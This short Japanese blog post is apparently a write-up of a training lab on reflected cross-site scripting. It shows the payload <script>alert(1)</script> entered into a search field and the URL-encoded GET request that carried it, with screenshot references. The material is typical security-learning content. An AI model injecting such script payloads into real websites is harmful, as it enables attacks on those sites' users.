shikata ga nai

Private? There is no such things.

Reflected XSS into HTML context with nothing encodedをやってみた

Hello there, ('ω')ノ

 

エンコードせずにXSSをHTMLコンテキストに反映を。

下記を入力して検索すると。

 <script>alert(1)</script>

 

f:id:ThisIsOne:20210222153613p:plain

 

スクリプトが実行されて。

 

f:id:ThisIsOne:20210222153634p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210222153906p:plain

 

リクエストは、下記のようにエンコードされていて。

 GET /?search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

 

f:id:ThisIsOne:20210222153736p:plain

 

パラメータをURLデコードして確認して。

 

f:id:ThisIsOne:20210222153840p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain